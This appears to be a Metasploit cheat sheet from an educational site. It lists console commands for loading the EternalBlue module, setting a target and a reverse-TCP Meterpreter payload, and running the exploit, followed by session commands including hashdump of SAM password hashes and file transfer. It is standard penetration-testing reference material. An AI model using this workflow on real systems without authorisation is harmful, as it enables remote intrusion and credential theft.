100% Free Forever
AI-Powered Learning
Industry Expert Content
Certificates & Badges
Learn At Your Own Pace

Metasploit Cheat Sheet

Metasploit Cheat Sheet

Covers the Metasploit Framework console workflow including module search, exploit configuration, payload selection, and session handling.

2 PagesIntermediateFeb 15, 2026

msfconsole Basics

Launching and navigating the Metasploit console.

bash
msfconsole                     # Launch the consolesearch type:exploit eternalblue # Search for a moduleuse exploit/windows/smb/ms17_010_eternalblue  # Select a moduleinfo                            # Show details of selected moduleshow options                    # List required/optional parametersshow payloads                   # List compatible payloads

Configuring and Running an Exploit

Setting options and launching an exploit against a target.

bash
set RHOSTS 192.168.1.50set RPORT 445set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 192.168.1.10set LPORT 4444check                           # Verify target is likely vulnerableexploit                         # Or: run

Session & Meterpreter Commands

Managing active sessions after successful exploitation.

  • sessions -l- List active sessions
  • sessions -i <id>- Interact with a specific session
  • background- Send current Meterpreter session to background (Ctrl+Z also works)
  • sysinfo- Show target system information (Meterpreter)
  • getuid- Show current user context (Meterpreter)
  • hashdump- Dump password hashes from SAM database (requires privileges)
  • upload / download- Transfer files to/from the target (Meterpreter)

Module Types

The major categories of modules in the framework.

  • Exploit- Code that takes advantage of a specific vulnerability
  • Payload- Code executed on the target after successful exploitation
  • Auxiliary- Scanning, fuzzing, and other non-exploit modules
  • Post- Post-exploitation actions run on an active session
  • Encoder- Obfuscates payloads to evade signature-based detection
Pro Tip

Run 'db_nmap' instead of a plain nmap scan when the PostgreSQL database is connected — results are stored automatically and can be queried with 'hosts' and 'services', feeding directly into module targeting.

Was this cheat sheet helpful?

Explore Topics

#Metasploit#MetasploitCheatSheet#Cybersecurity#Intermediate#MsfconsoleBasics#ConfiguringAndRunningAnExploit#SessionMeterpreterCommands#ModuleTypes#CheatSheet#SkillVeris